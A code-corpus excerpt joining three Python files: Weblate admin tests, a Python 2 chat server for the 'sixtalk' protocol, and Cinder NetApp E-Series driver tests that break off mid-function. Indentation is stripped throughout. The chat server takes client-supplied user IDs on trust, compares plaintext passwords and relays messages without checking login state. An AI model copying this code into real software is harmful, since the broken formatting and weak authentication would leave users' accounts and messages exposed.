@responses.activate
def test_activation_community(self):
responses.add(
responses.POST,
settings.SUPPORT_API_URL,
body=json.dumps(
{
"name": "community",
"backup_repository": "",
"expiry": timezone.now(),
"in_limits": True,
},
cls=DjangoJSONEncoder,
),
)
self.client.post(reverse("manage-activate"), {"secret": "123456"})
status = SupportStatus.objects.get()
self.assertEqual(status.name, "community")
self.assertFalse(BackupService.objects.exists())
self.assertFalse(status.discoverable)
self.client.post(reverse("manage-discovery"))
status = SupportStatus.objects.get()
self.assertTrue(status.discoverable)
@responses.activate
def test_activation_hosted(self):
responses.add(
responses.POST,
settings.SUPPORT_API_URL,
body=json.dumps(
{
"name": "hosted",
"backup_repository": "/tmp/xxx",
"expiry": timezone.now(),
"in_limits": True,
},
cls=DjangoJSONEncoder,
),
)
self.client.post(reverse("manage-activate"), {"secret": "123456"})
status = SupportStatus.objects.get()
self.assertEqual(status.name, "hosted")
backup = BackupService.objects.get()
self.assertEqual(backup.repository, "/tmp/xxx")
self.assertFalse(backup.enabled)
self.assertFalse(status.discoverable)
self.client.post(reverse("manage-discovery"))
status = SupportStatus.objects.get()
self.assertTrue(status.discoverable)
def test_group_management(self):
# Add form
response = self.client.get(reverse("admin:weblate_auth_group_add"))
self.assertContains(response, "Automatic group assignment")
# Create group
name = "Test group"
response = self.client.post(
reverse("admin:weblate_auth_group_add"),
{
"name": name,
"language_selection": "1",
"project_selection": "1",
"autogroup_set-TOTAL_FORMS": "0",
"autogroup_set-INITIAL_FORMS": "0",
},
follow=True,
)
self.assertContains(response, name)
# Edit form
group = Group.objects.get(name=name)
url = reverse("admin:weblate_auth_group_change", kwargs={"object_id": group.pk})
response = self.client.get(url)
self.assertContains(response, "Automatic group assignment")
self.assertContains(response, name)
| phw/weblate | weblate/wladmin/tests.py | Python | gpl-3.0 | 13,318 |
#!/usr/bin/env python
import socket
import struct
import stkuser
from stkutil import running, socklist, updateinfo
STK_SERVER_PORT = 9007
STK_MAX_CLIENTS = 30
STK_MAX_PACKET_SIZE = 65535
STK_MAGIC = 'ST'
STK_VERSION = 0x0001
STK_CLIENT_FLAG = 0x00
STK_SERVER_FLAG = 0x01
STK_END = 0x07
COMMANDS = {
'REQ_LOGIN' : 0x01,
'LOGIN' : 0x02,
'KEEPALIVE' : 0x03,
'LOGOUT' : 0x04,
'GET_USER' : 0x05,
'GET_ONLINE_USER' : 0x06,
'GET_USER_INFO' : 0x07,
'GET_GROUP' : 0x08,
'GET_GROUP_INFO' : 0x09,
'SEND_MSG' : 0x0A,
'REPLY_MSG' : 0x0B,
'SEND_GMSG' : 0x0C,
'REPLY_GMSG' : 0x0D,
'END' : 0xFF
}
# user and group information
user = stkuser.StkUsers()
group = stkuser.StkGroups()
class StkPacket:
sp = { 'magic':'', 'version':0, 'cmd':0, 'sid':0, 'uid':0,
'token':0, 'reserve':0, 'flag':0, 'length':0, 'data':'', 'end':0 }
def __init__(self, buf):
head = buf[:20]
self.sp['data'] = buf[20:-1]
self.sp['end'], = struct.unpack('!B', buf[-1])
self.sp['magic'], \
self.sp['version'], \
self.sp['cmd'], \
self.sp['sid'], \
self.sp['uid'], \
self.sp['token'], \
self.sp['reserve'], \
self.sp['flag'], \
self.sp['length'] = struct.unpack('!2sHHHIIBBH', head)
def check_head_valid(self):
if (self.sp['magic'] != STK_MAGIC \
or self.sp['version'] != STK_VERSION \
or self.sp['flag'] != STK_CLIENT_FLAG \
or self.sp['end'] != STK_END):
return False
else:
return True
def get_stk_uid(self):
return self.sp['uid']
def get_stk_cmd(self):
return self.sp['cmd']
def get_stk_sid(self):
return self.sp['sid']
def get_stk_len(self):
return self.sp['length']
def get_stk_data(self):
return self.sp['data']
def show_stk_head(self):
print 'Magic: %s' % self.sp['magic']
print 'Version: 0x%04x' % self.sp['version']
print 'Command: 0x%04x' % self.sp['cmd']
print 'SessionID: %u' % self.sp['sid']
print 'STKID: %u' % self.sp['uid']
print 'Token: %u' % self.sp['token']
print 'Reserved: %u' % self.sp['reserve']
if self.sp['flag'] == 0:
print 'Client Packet'
else:
print 'Server Packet'
print 'Length: %u' % self.sp['length']
print 'End: 0x%02u' % self.sp['end']
print ''
class StkClient:
sock = None
uid = 0
sid = 0
state = 0
token = 0
reverse = 0
def __init__(self, sock):
self.sock = sock
def stk_set_client(self, uid, sid):
global socklist
self.uid = uid
self.sid = sid
socklist[str(uid)] = self.sock
def stk_get_sock(self):
return self.sock
def stk_reqlog_ack(self, data):
buf = struct.pack('!2sHHHIIBBHB', STK_MAGIC, STK_VERSION, COMMANDS['REQ_LOGIN'], self.sid,
self.uid, self.token, self.reverse, STK_SERVER_FLAG, 0, STK_END)
self.sock.send(buf)
def stk_login_ack(self, data):
global updatedata, socklist, updateinfo
passwd = user.stk_get_pass(self.uid)
result = 0
passtmp, reversetmp = struct.unpack('!32s64s', data)
passnew = passtmp.strip('\000')
if passwd == 'STK_UNKNOWN_USER':
result = 2
elif self.state == 1:
result = 1
elif passwd == passnew:
print 'STK Client %s(%u) is Login in.' % (user.stk_get_nickname(self.uid), self.uid)
self.state = 1
socklist[self.uid] = [self.sock, self.state]
# Notify ui to update
updateinfo.append([self.uid, u'online'])
result = 0
else:
result = 3
buf = struct.pack('!2sHHHIIBBHBB', STK_MAGIC, STK_VERSION, COMMANDS['LOGIN'], self.sid,
self.uid, self.token, self.reverse, STK_SERVER_FLAG, 1, result, STK_END)
self.sock.send(buf)
def stk_keepalive_ack(self, data):
pass
def stk_getuser_ack(self, data):
global user
uids = user.stk_get_uids()
length = 4 * (len(uids) - 1) + 2
buf = struct.pack('!2sHHHIIBBHH', STK_MAGIC, STK_VERSION, COMMANDS['GET_USER'], self.sid,
self.uid, self.token, self.reverse, STK_SERVER_FLAG, length, len(uids)-1)
for k in uids:
if k == self.uid:
pass
else:
buf += struct.pack('!I', k)
buf += struct.pack('!B', STK_END)
self.sock.send(buf)
def stk_getonlineuser_ack(self, data):
pass
def stk_getuserinfo_ack(self, data):
global user
uid, nickname, city, phone, gender = struct.unpack('!I32s16sIB', data)
uinfo = user.stk_get_userinfo(uid)
length = 4 + 32 + 16 + 4 + 1
buf = struct.pack('!2sHHHIIBBHI32s16sIBB', STK_MAGIC, STK_VERSION, COMMANDS['GET_USER_INFO'], self.sid,
self.uid, self.token, self.reverse, STK_SERVER_FLAG, length, uinfo['uid'],
uinfo['nickname'].encode(), uinfo['city'].encode(), uinfo['phone'], uinfo['gender'], STK_END)
self.sock.send(buf)
def stk_getgroup_ack(self, data):
global group
gids = group.stk_get_gids()
length = 4 * len(gids) + 2
buf = struct.pack('!2sHHHIIBBHH', STK_MAGIC, STK_VERSION, COMMANDS['GET_GROUP'], self.sid,
self.uid, self.token, self.reverse, STK_SERVER_FLAG, length, len(gids))
for k in gids:
buf += struct.pack('!I', k)
buf += struct.pack('!B', STK_END)
self.sock.send(buf)
def stk_getgroupinfo_ack(self, data):
global group
gid, gname, membernum = struct.unpack('!I32sH', data)
ginfo = group.stk_get_groupinfo(gid)
members = ginfo['members'].split('-')
length = 4 + 32 + 2 + 4 * len(members)
buf = struct.pack('!2sHHHIIBBHI32sH', STK_MAGIC, STK_VERSION, COMMANDS['GET_GROUP_INFO'], self.sid,
self.uid, self.token, self.reverse, STK_SERVER_FLAG, length, ginfo['gid'],
ginfo['gname'].encode(), len(members))
for k in members:
buf += struct.pack('!I', int(k))
buf += struct.pack('!B', STK_END)
self.sock.send(buf)
def stk_sendmsg_ack(self, data):
global user, socklist
tmp = data[:4]
msg = data[4:]
uid, = struct.unpack('!I', tmp)
length = 4 + len(msg)
buf = struct.pack('!2sHHHIIBBHI', STK_MAGIC, STK_VERSION, COMMANDS['SEND_MSG'], self.sid,
self.uid, self.token, self.reverse, STK_SERVER_FLAG, length, uid)
buf += msg + struct.pack('!B', STK_END)
psock = socklist[uid][0]
if (psock != -1):
psock.send(buf)
else:
print 'Msg From %s(%u) to %s(%u), \n --- but %s is not online.' \
%(user.stk_get_nickname(self.uid), self.uid, \
user.stk_get_nickname(uid), uid, user.stk_get_nickname(uid))
def stk_sendgmsg_ack(self, data):
global group, socklist
tmp = data[:4]
msg = data[4:]
gid, = struct.unpack('!I', tmp)
length = 4 + len(msg)
buf = struct.pack('!2sHHHIIBBHI', STK_MAGIC, STK_VERSION, COMMANDS['SEND_GMSG'], self.sid,
self.uid, self.token, self.reverse, STK_SERVER_FLAG, length, gid)
buf += msg + struct.pack('!B', STK_END)
ginfo = group.stk_get_groupinfo(gid)
members = ginfo['members'].split('-')
for k in members:
if self.uid == int(k):
continue
psock = socklist[int(k)][0]
if (psock != -1):
psock.send(buf)
else:
print 'Msg form %s(%u) by %s(%u), \n --- but %s(%u) is not online.' \
% (group.stk_get_groupname(gid), gid, \
user.stk_get_nickname(self.uid), self.uid, \
user.stk_get_nickname(int(k)), int(k))
def stk_socket_thread(t):
c = t[0]
client = StkClient(c)
while 1:
try:
buf = c.recv(STK_MAX_PACKET_SIZE)
# socket.timeout or socket.error or ...
except socket.timeout:
global running
if running == False:
break;
except socket.error:
# Whatever, error happen, just exit
break;
else:
size = len(buf)
if size == -1:
print 'Recv Socket Error.'
break;
elif size == 0:
print 'Peer Socket Shutdown.'
break;
elif size > STK_MAX_PACKET_SIZE:
print 'Drop Packet(Too Large).'
break;
else:
pass
h = StkPacket(buf)
#h.show_stk_head()
if (h.check_head_valid() != True):
print 'Bad STK Packet.'
continue
cmd = h.get_stk_cmd()
uid = h.get_stk_uid()
sid = h.get_stk_sid()
data = h.get_stk_data()
length = h.get_stk_len()
del h
if cmd == COMMANDS['REQ_LOGIN']:
client.stk_set_client(uid, sid)
client.stk_reqlog_ack(data)
elif cmd == COMMANDS['LOGIN']:
client.stk_login_ack(data)
elif cmd == COMMANDS['KEEPALIVE']:
client.stk_keepalive_ack(data)
elif cmd == COMMANDS['LOGOUT']:
pass
elif cmd == COMMANDS['GET_USER']:
client.stk_getuser_ack(data)
elif cmd == COMMANDS['GET_ONLINE_USER']:
client.stk_getonlineuser_ack(data)
elif cmd == COMMANDS['GET_USER_INFO']:
client.stk_getuserinfo_ack(data)
elif cmd == COMMANDS['GET_GROUP']:
client.stk_getgroup_ack(data)
elif cmd == COMMANDS['GET_GROUP_INFO']:
client.stk_getgroupinfo_ack(data)
elif cmd == COMMANDS['SEND_MSG']:
client.stk_sendmsg_ack(data)
elif cmd == COMMANDS['REPLY_MSG']:
pass
elif cmd == COMMANDS['SEND_GMSG']:
client.stk_sendgmsg_ack(data)
elif cmd == COMMANDS['REPLY_GMSG']:
pass
else:
print 'Unknow Command, Drop.'
pass
c.close
# Notify ui to update
global socklist, updateinfo
socklist[uid] = [None, 0]
updateinfo.append([uid, u'offline'])
print 'Client socket thread exiting...'
| sharmer/sixtalk | stkserver/python/stksocket.py | Python | gpl-2.0 | 8,920 |
# Copyright (c) 2014 Andrew Kerr
# Copyright (c) 2015 Alex Meade
# Copyright (c) 2015 Rushil Chugh
# Copyright (c) 2015 Yogesh Kshirsagar
# Copyright (c) 2015 Michael Price
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import ddt
import mock
from oslo_utils import units
import six
from cinder import exception
from cinder import test
from cinder.tests.unit import fake_snapshot
from cinder.tests.unit.volume.drivers.netapp.eseries import fakes as \
eseries_fake
from cinder.volume.drivers.netapp.eseries import client as es_client
from cinder.volume.drivers.netapp.eseries import exception as eseries_exc
from cinder.volume.drivers.netapp.eseries import host_mapper
from cinder.volume.drivers.netapp.eseries import library
from cinder.volume.drivers.netapp.eseries import utils
from cinder.volume.drivers.netapp import utils as na_utils
from cinder.zonemanager import utils as fczm_utils
def get_fake_volume():
return {
'id': '114774fb-e15a-4fae-8ee2-c9723e3645ef', 'size': 1,
'volume_name': 'lun1', 'host': 'hostname@backend#DDP',
'os_type': 'linux', 'provider_location': 'lun1',
'name_id': '114774fb-e15a-4fae-8ee2-c9723e3645ef',
'provider_auth': 'provider a b', 'project_id': 'project',
'display_name': None, 'display_description': 'lun1',
'volume_type_id': None, 'migration_status': None, 'attach_status':
"detached"
}
@ddt.ddt
class NetAppEseriesLibraryTestCase(test.TestCase):
def setUp(self):
super(NetAppEseriesLibraryTestCase, self).setUp()
kwargs = {'configuration':
eseries_fake.create_configuration_eseries()}
self.library = library.NetAppESeriesLibrary('FAKE', **kwargs)
# Deprecated Option
self.library.configuration.netapp_storage_pools = None
self.library._client = eseries_fake.FakeEseriesClient()
self.library.check_for_setup_error()
def test_do_setup(self):
self.mock_object(self.library,
'_check_mode_get_or_register_storage_system')
self.mock_object(es_client, 'RestClient',
eseries_fake.FakeEseriesClient)
mock_check_flags = self.mock_object(na_utils, 'check_flags')
self.library.do_setup(mock.Mock())
self.assertTrue(mock_check_flags.called)
def test_get_storage_pools_empty_result(self):
"""Verify an exception is raised if no pools are returned."""
self.library.configuration.netapp_pool_name_search_pattern = '$'
self.assertRaises(exception.NetAppDriverException,
self.library.check_for_setup_error)
def test_get_storage_pools_invalid_conf(self):
"""Verify an exception is raised if the regex pattern is invalid."""
self.library.configuration.netapp_pool_name_search_pattern = '(.*'
self.assertRaises(exception.InvalidConfigurationValue,
self.library._get_storage_pools)
def test_get_storage_pools_default(self):
"""Verify that all pools are returned if the search option is empty."""
filtered_pools = self.library._get_storage_pools()
self.assertEqual(eseries_fake.STORAGE_POOLS, filtered_pools)
@ddt.data(('[\d]+,a', ['1', '2', 'a', 'b'], ['1', '2', 'a']),
('1 , 3', ['1', '2', '3'], ['1', '3']),
('$,3', ['1', '2', '3'], ['3']),
('[a-zA-Z]+', ['1', 'a', 'B'], ['a', 'B']),
('', ['1', '2'], ['1', '2'])
)
@ddt.unpack
def test_get_storage_pools(self, pool_filter, pool_labels,
expected_pool_labels):
"""Verify that pool filtering via the search_pattern works correctly
:param pool_filter: A regular expression to be used for filtering via
pool labels
:param pool_labels: A list of pool labels
:param expected_pool_labels: The labels from 'pool_labels' that
should be matched by 'pool_filter'
"""
self.library.configuration.netapp_pool_name_search_pattern = (
pool_filter)
pools = [{'label': label} for label in pool_labels]
self.library._client.list_storage_pools = mock.Mock(
return_value=pools)
filtered_pools = self.library._get_storage_pools()
filtered_pool_labels = [pool['label'] for pool in filtered_pools]
self.assertEqual(expected_pool_labels, filtered_pool_labels)
def test_get_volume(self):
fake_volume = copy.deepcopy(get_fake_volume())
volume = copy.deepcopy(eseries_fake.VOLUME)
self.library._client.list_volume = mock.Mock(return_value=volume)
result = self.library._get_volume(fake_volume['id'])
self.assertEqual(1, self.library._client.list_volume.call_count)
self.assertDictMatch(volume, result)
def test_get_volume_bad_input(self):
volume = copy.deepcopy(eseries_fake.VOLUME)
self.library._client.list_volume = mock.Mock(return_value=volume)
self.assertRaises(exception.InvalidInput, self.library._get_volume,
None)
def test_get_volume_bad_uuid(self):
volume = copy.deepcopy(eseries_fake.VOLUME)
self.library._client.list_volume = mock.Mock(return_value=volume)
self.assertRaises(ValueError, self.library._get_volume, '1')
def test_update_ssc_info_no_ssc(self):
drives = [{'currentVolumeGroupRef': 'test_vg1',
'driveMediaType': 'ssd'}]
pools = [{'volumeGroupRef': 'test_vg1', 'label': 'test_vg1',
'raidLevel': 'raid6', 'securityType': 'enabled'}]
self.library._client = mock.Mock()
self.library._client.features.SSC_API_V2 = na_utils.FeatureState(
False, minimum_version="1.53.9000.1")
self.library._client.SSC_VALID_VERSIONS = [(1, 53, 9000, 1),
(1, 53, 9010, 15)]
self.library.configuration.netapp_pool_name_search_pattern = "test_vg1"
self.library._client.list_storage_pools = mock.Mock(return_value=pools)
self.library._client.list_drives = mock.Mock(return_value=drives)
self.library._update_ssc_info()
self.assertEqual(
{'test_vg1': {'netapp_disk_encryption': 'true',
'netapp_disk_type': 'SSD',
'netapp_raid_type': 'raid6'}},
self.library._ssc_stats)
@ddt.data(True, False)
def test_update_ssc_info(self, data_assurance_supported):
self.library._client = mock.Mock()
self.library._client.features.SSC_API_V2 = na_utils.FeatureState(
True, minimum_version="1.53.9000.1")
self.library._client.list_ssc_storage_pools = mock.Mock(
return_value=eseries_fake.SSC_POOLS)
self.library._get_storage_pools = mock.Mock(
return_value=eseries_fake.STORAGE_POOLS)
# Data Assurance is not supported on some storage backends
self.library._is_data_assurance_supported = mock.Mock(
return_value=data_assurance_supported)
self.library._update_ssc_info()
for pool in eseries_fake.SSC_POOLS:
poolId = pool['poolId']
raid_lvl = self.library.SSC_RAID_TYPE_MAPPING.get(
pool['raidLevel'], 'unknown')
if pool['pool']["driveMediaType"] == 'ssd':
disk_type = 'SSD'
else:
disk_type = pool['pool']['drivePhysicalType']
disk_type = (
self.library.SSC_DISK_TYPE_MAPPING.get(
disk_type, 'unknown'))
da_enabled = pool['dataAssuranceCapable'] and (
data_assurance_supported)
thin_provisioned = pool['thinProvisioningCapable']
expected = {
'netapp_disk_encryption':
six.text_type(pool['encrypted']).lower(),
'netapp_eseries_flash_read_cache':
six.text_type(pool['flashCacheCapable']).lower(),
'netapp_thin_provisioned':
six.text_type(thin_provisioned).lower(),
'netapp_eseries_data_assurance':
six.text_type(da_enabled).lower(),
'netapp_eseries_disk_spindle_speed': pool['spindleSpeed'],
'netapp_raid_type': raid_lvl,
'netapp_disk_type': disk_type
}
actual = self.library._ssc_stats[poolId]
self.assertDictMatch(expected, actual)
@ddt.data(('FC', True), ('iSCSI', False))
@ddt.unpack
def test_is_data_assurance_supported(self, backend_storage_protocol,
enabled):
self.mock_object(self.library, 'driver_protocol',
backend_storage_protocol)
actual = self.library._is_data_assurance_supported()
self.assertEqual(enabled, actual)
@ddt.data('scsi', 'fibre', 'sas', 'sata', 'garbage')
def test_update_ssc_disk_types(self, disk_type):
drives = [{'currentVolumeGroupRef': 'test_vg1',
'interfaceType': {'driveType': disk_type}}]
pools = [{'volumeGroupRef': 'test_vg1'}]
self.library._client.list_drives = mock.Mock(return_value=drives)
self.library._client.get_storage_pool = mock.Mock(return_value=pools)
ssc_stats = self.library._update_ssc_disk_types(pools)
expected = self.library.SSC_DISK_TYPE_MAPPING.get(disk_type, 'unknown')
self.assertEqual({'test_vg1': {'netapp_disk_type': expected}},
ssc_stats)
@ddt.data('scsi', 'fibre', 'sas', 'sata', 'garbage')
def test_update_ssc_disk_types_ssd(self, disk_type):
drives = [{'currentVolumeGroupRef': 'test_vg1',
'driveMediaType': 'ssd', 'driveType': disk_type}]
pools = [{'volumeGroupRef': 'test_vg1'}]
self.library._client.list_drives = mock.Mock(return_value=drives)
self.library._client.get_storage_pool = mock.Mock(return_value=pools)
ssc_stats = self.library._update_ssc_disk_types(pools)
self.assertEqual({'test_vg1': {'netapp_disk_type': 'SSD'}},
ssc_stats)
@ddt.data('enabled', 'none', 'capable', 'unknown', '__UNDEFINED',
'garbage')
def test_update_ssc_disk_encryption(self, securityType):
pools = [{'volumeGroupRef': 'test_vg1', 'securityType': securityType}]
self.library._client.list_storage_pools = mock.Mock(return_value=pools)
ssc_stats = self.library._update_ssc_disk_encryption(pools)
# Convert the boolean value to a lower-case string value
expected = 'true' if securityType == "enabled" else 'false'
self.assertEqual({'test_vg1': {'netapp_disk_encryption': expected}},
ssc_stats)
def test_update_ssc_disk_encryption_multiple(self):
pools = [{'volumeGroupRef': 'test_vg1', 'securityType': 'none'},
{'volumeGroupRef': 'test_vg2', 'securityType': 'enabled'}]
self.library._client.list_storage_pools = mock.Mock(return_value=pools)
ssc_stats = self.library._update_ssc_disk_encryption(pools)
self.assertEqual({'test_vg1': {'netapp_disk_encryption': 'false'},
'test_vg2': {'netapp_disk_encryption': 'true'}},
ssc_stats)
@ddt.data(True, False)
def test_get_volume_stats(self, refresh):
fake_stats = {'key': 'val'}
def populate_stats():
self.library._stats = fake_stats
self.library._update_volume_stats = mock.Mock(
side_effect=populate_stats)
self.library._update_ssc_info = mock.Mock()
self.library._ssc_stats = {self.library.THIN_UQ_SPEC: True}
actual = self.library.get_volume_stats(refresh = refresh)
if(refresh):
self.library._update_volume_stats.assert_called_once_with()
self.assertEqual(fake_stats, actual)
else:
self.assertEqual(0, self.library._update_volume_stats.call_count)
self.assertEqual(0, self.library._update_ssc_info.call_count)
def test_get_volume_stats_no_ssc(self):
"""Validate that SSC data is collected if not yet populated"""
fake_stats = {'key': 'val'}
def populate_stats():
self.library._stats = fake_stats
self.library._update_volume_stats = mock.Mock(
side_effect=populate_stats)
self.library._update_ssc_info = mock.Mock()
self.library._ssc_stats = None
actual = self.library.get_volume_stats(refresh = True)
self.library._update_volume_stats.assert_called_once_with()
self.library._update_ssc_info.assert_called_once_with()
self.assertEqual(fake_stats, actual)
def test_update_volume_stats_provisioning(self):
"""Validate pool capacity calculations"""
fake_pool = copy.deepcopy(eseries_fake.STORAGE_POOL)
self.library._get_storage_pools = mock.Mock(return_value=[fake_pool])
self.mock_object(self.library, '_ssc_stats', new_attr={fake_pool[
"volumeGroupRef"]: {self.library.THIN_UQ_SPEC: True}})
self.library.configuration = mock.Mock()
reserved_pct = 5
over_subscription_ratio = 1.0
self.library.configuration.max_over_subscription_ratio = (
over_subscription_ratio)
self.library.configuration.reserved_percentage = reserved_pct
total_gb = int(fake_pool['totalRaidedSpace']) / units.Gi
used_gb = int(fake_pool['usedSpace']) / units.Gi
free_gb = total_gb - used_gb
self.library._update_volume_stats()
self.assertEqual(1, len(self.library._stats['pools']))
pool_stats = self.library._stats['pools'][0]
self.assertEqual(fake_pool['label'], pool_stats.get('pool_name'))
self.assertEqual(reserved_pct, pool_stats['reserved_percentage'])
self.assertEqual(over_subscription_ratio,
pool_stats['max_oversubscription_ratio'])
self.assertEqual(total_gb, pool_stats.get('total_capacity_gb'))
self.assertEqual(used_gb, pool_stats.get('provisioned_capacity_gb'))
self.assertEqual(free_gb, pool_stats.get('free_capacity_gb'))
@ddt.data(False, True)
def test_update_volume_stats_thin_provisioning(self, thin_provisioning):
"""Validate that thin provisioning support is correctly reported"""
fake_pool = copy.deepcopy(eseries_fake.STORAGE_POOL)
self.library._get_storage_pools = mock.Mock(return_value=[fake_pool])
self.mock_object(self.library, '_ssc_stats', new_attr={fake_pool[
"volumeGroupRef"]: {self.library.THIN_UQ_SPEC: thin_provisioning}})
self.library._update_volume_stats()
self.assertEqual(1, len(self.library._stats['pools']))
pool_stats = self.library._stats['pools'][0]
self.assertEqual(thin_provisioning, pool_stats.get(
'thin_provisioning_support'))
# Should always be True
self.assertTrue(pool_stats.get('thick_provisioning_support'))
def test_update_volume_stats_ssc(self):
"""Ensure that the SSC data is correctly reported in the pool stats"""
ssc = {self.library.THIN_UQ_SPEC: True, 'key': 'val'}
fake_pool = copy.deepcopy(eseries_fake.STORAGE_POOL)
self.library._get_storage_pools = mock.Mock(return_value=[fake_pool])
self.mock_object(self.library, '_ssc_stats', new_attr={fake_pool[
"volumeGroupRef"]: ssc})
self.library._update_volume_stats()
self.assertEqual(1, len(self.library._stats['pools']))
pool_stats = self.library._stats['pools'][0]
for key in ssc:
self.assertIn(key, pool_stats)
self.assertEqual(ssc[key], pool_stats[key])
def test_update_volume_stats_no_ssc(self):
"""Ensure that that pool stats are correctly reported without SSC"""
fake_pool = copy.deepcopy(eseries_fake.STORAGE_POOL)
self.library._get_storage_pools = mock.Mock(return_value=[fake_pool])
self.library._update_volume_stats()
self.assertEqual(1, len(self.library._stats['pools']))
pool_stats = self.library._stats['pools'][0]
self.assertFalse(pool_stats.get('thin_provisioning_support'))
# Should always be True
self.assertTrue(pool_stats.get('thick_provisioning_support'))
def test_terminate_connection_iscsi_no_hosts(self):
connector = {'initiator': eseries_fake.INITIATOR_NAME}
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[]))
self.assertRaises(exception.NotFound,
self.library.terminate_connection_iscsi,
get_fake_volume(),
connector)
def test_terminate_connection_iscsi_volume_not_mapped(self):
connector = {'initiator': eseries_fake.INITIATOR_NAME}
volume = copy.deepcopy(eseries_fake.VOLUME)
volume['listOfMappings'] = []
self.library._get_volume = mock.Mock(return_value=volume)
self.assertRaises(eseries_exc.VolumeNotMapped,
self.library.terminate_connection_iscsi,
get_fake_volume(),
connector)
def test_terminate_connection_iscsi_volume_mapped(self):
connector = {'initiator': eseries_fake.INITIATOR_NAME}
fake_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
fake_eseries_volume['listOfMappings'] = [
eseries_fake.VOLUME_MAPPING
]
self.mock_object(self.library._client, 'list_volume',
mock.Mock(return_value=fake_eseries_volume))
self.mock_object(host_mapper, 'unmap_volume_from_host')
self.library.terminate_connection_iscsi(get_fake_volume(), connector)
self.assertTrue(host_mapper.unmap_volume_from_host.called)
def test_terminate_connection_iscsi_not_mapped_initiator_does_not_exist(
self):
connector = {'initiator': eseries_fake.INITIATOR_NAME}
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[eseries_fake.HOST_2]))
self.assertRaises(exception.NotFound,
self.library.terminate_connection_iscsi,
get_fake_volume(),
connector)
def test_initialize_connection_iscsi_volume_not_mapped(self):
connector = {'initiator': eseries_fake.INITIATOR_NAME}
self.mock_object(self.library._client,
'get_volume_mappings_for_volume',
mock.Mock(return_value=[]))
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
fake_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
fake_eseries_volume['listOfMappings'] = [
eseries_fake.VOLUME_MAPPING
]
self.mock_object(self.library._client, 'list_volume',
mock.Mock(return_value=fake_eseries_volume))
self.library.initialize_connection_iscsi(get_fake_volume(), connector)
self.assertTrue(
self.library._client.get_volume_mappings_for_volume.called)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
def test_initialize_connection_iscsi_volume_not_mapped_host_does_not_exist(
self):
connector = {'initiator': eseries_fake.INITIATOR_NAME}
self.mock_object(self.library._client,
'get_volume_mappings_for_volume',
mock.Mock(return_value=[]))
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[]))
self.mock_object(self.library._client, 'create_host_with_ports',
mock.Mock(return_value=eseries_fake.HOST))
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
fake_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
fake_eseries_volume['listOfMappings'] = [
eseries_fake.VOLUME_MAPPING
]
self.mock_object(self.library._client, 'list_volume',
mock.Mock(return_value=fake_eseries_volume))
self.library.initialize_connection_iscsi(get_fake_volume(), connector)
self.assertTrue(
self.library._client.get_volume_mappings_for_volume.called)
self.assertTrue(self.library._client.list_hosts.called)
self.assertTrue(self.library._client.create_host_with_ports.called)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
def test_initialize_connection_iscsi_volume_already_mapped_to_target_host(
self):
"""Should be a no-op"""
connector = {'initiator': eseries_fake.INITIATOR_NAME}
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
return_value=eseries_fake.VOLUME_MAPPING))
fake_eseries_volume = copy.deepcopy(eseries_fake.VOLUME)
self.mock_object(self.library._client, 'list_volume',
mock.Mock(return_value=fake_eseries_volume))
self.library.initialize_connection_iscsi(get_fake_volume(), connector)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
def test_initialize_connection_iscsi_volume_mapped_to_another_host(self):
"""Should raise error saying multiattach not enabled"""
connector = {'initiator': eseries_fake.INITIATOR_NAME}
fake_mapping_to_other_host = copy.deepcopy(
eseries_fake.VOLUME_MAPPING)
fake_mapping_to_other_host['mapRef'] = eseries_fake.HOST_2[
'hostRef']
self.mock_object(host_mapper, 'map_volume_to_single_host',
mock.Mock(
side_effect=exception.NetAppDriverException))
self.assertRaises(exception.NetAppDriverException,
self.library.initialize_connection_iscsi,
get_fake_volume(), connector)
self.assertTrue(host_mapper.map_volume_to_single_host.called)
@ddt.data(eseries_fake.WWPN,
fczm_utils.get_formatted_wwn(eseries_fake.WWPN))
def test_get_host_with_matching_port_wwpn(self, port_id):
port_ids = [port_id]
host = copy.deepcopy(eseries_fake.HOST)
host.update(
{
'hostSidePorts': [{'label': 'NewStore', 'type': 'fc',
'address': eseries_fake.WWPN}]
}
)
host_2 = copy.deepcopy(eseries_fake.HOST_2)
host_2.update(
{
'hostSidePorts': [{'label': 'NewStore', 'type': 'fc',
'address': eseries_fake.WWPN_2}]
}
)
host_list = [host, host_2]
self.mock_object(self.library._client,
'list_hosts',
mock.Mock(return_value=host_list))
actual_host = self.library._get_host_with_matching_port(
port_ids)
self.assertEqual(host, actual_host)
def test_get_host_with_matching_port_iqn(self):
port_ids = [eseries_fake.INITIATOR_NAME]
host = copy.deepcopy(eseries_fake.HOST)
host.update(
{
'hostSidePorts': [{'label': 'NewStore', 'type': 'iscsi',
'address': eseries_fake.INITIATOR_NAME}]
}
)
host_2 = copy.deepcopy(eseries_fake.HOST_2)
host_2.update(
{
'hostSidePorts': [{'label': 'NewStore', 'type': 'iscsi',
'address': eseries_fake.INITIATOR_NAME_2}]
}
)
host_list = [host, host_2]
self.mock_object(self.library._client,
'list_hosts',
mock.Mock(return_value=host_list))
actual_host = self.library._get_host_with_matching_port(
port_ids)
self.assertEqual(host, actual_host)
def test_terminate_connection_fc_no_hosts(self):
connector = {'wwpns': [eseries_fake.WWPN]}
self.mock_object(self.library._client, 'list_hosts',
mock.Mock(return_value=[]))
self.assertRaises(exception.NotFound,
self.library.terminate_connection_fc,
get_fake_volume(),
connector)
def test_terminate_connection_fc_volume_not_mapped(self):
